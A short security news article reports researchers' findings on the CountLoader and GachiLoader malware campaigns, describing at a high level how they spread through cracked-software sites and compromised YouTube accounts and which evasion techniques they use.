Cracked Software and YouTube Videos Spread CountLoader and GachiLoader Malware
Researchers have disclosed details of a new campaign using cracked software distribution sites to spread a new version of the modular loader known as CountLoader.
The campaign uses CountLoader as the initial tool in a multistage attack for access, evasion, and delivery of additional malware families, said the Cyderes Howler Cell Threat Intelligence team.
CountLoader was previously documented by both Fortinet and Silent Push, detailing the loader’s ability to push payloads like Cobalt Strike, AdaptixC2, PureHVNC RAT, Amatera Stealer, and PureMiner.
CountLoader’s Latest Attack Chain
The latest attack chain begins when unsuspecting users attempt to download cracked versions of legitimate software like Microsoft Word, which causes them to be redirected to a MediaFire link hosting a malicious ZIP archive.
The ZIP archive contains an encrypted ZIP file and a Microsoft Word document with the password to open the second archive.
Present within the ZIP file is a renamed legitimate Python interpreter (“Setup.exe”) that has been configured to execute a malicious command to retrieve CountLoader 3.2 from a remote server using “mshta.exe.”
GachiLoader Distributed via YouTube Ghost Network
Meanwhile, Check Point disclosed details of a new, heavily obfuscated JavaScript malware loader dubbed GachiLoader that’s written in Node.js.
The malware is distributed by means of the YouTube Ghost Network, a network of compromised YouTube accounts that engage in malware distribution.
One variant of GachiLoader deploys a second-stage malware, Kidkadi, that implements a novel technique for Portable Executable (PE) injection.
CountLoader and GachiLoader’s Sophistication
Both CountLoader and GachiLoader demonstrate an increased sophistication in their attack chains, said the researchers.
CountLoader’s ability to deliver ACR Stealer through a multi-stage process starting from Python library tampering to in-memory shellcode unpacking highlights a growing trend of signed binary abuse and fileless execution tactics.
GachiLoader’s use of Vectored Exception Handling to replace a legitimate DLL with a malicious payload is a new variation of a known technique.
Conclusion
In conclusion, the disclosure of CountLoader and GachiLoader’s attack chains highlights the need for proactive detection and layered defense strategies.
The threat actors behind these malware loaders have demonstrated proficiency with Windows internals and have come up with new variations of known techniques.
It is essential for security researchers to stay up-to-date with malware techniques and to proactively look for new ways in which malware authors try to evade detection.
Source: Link
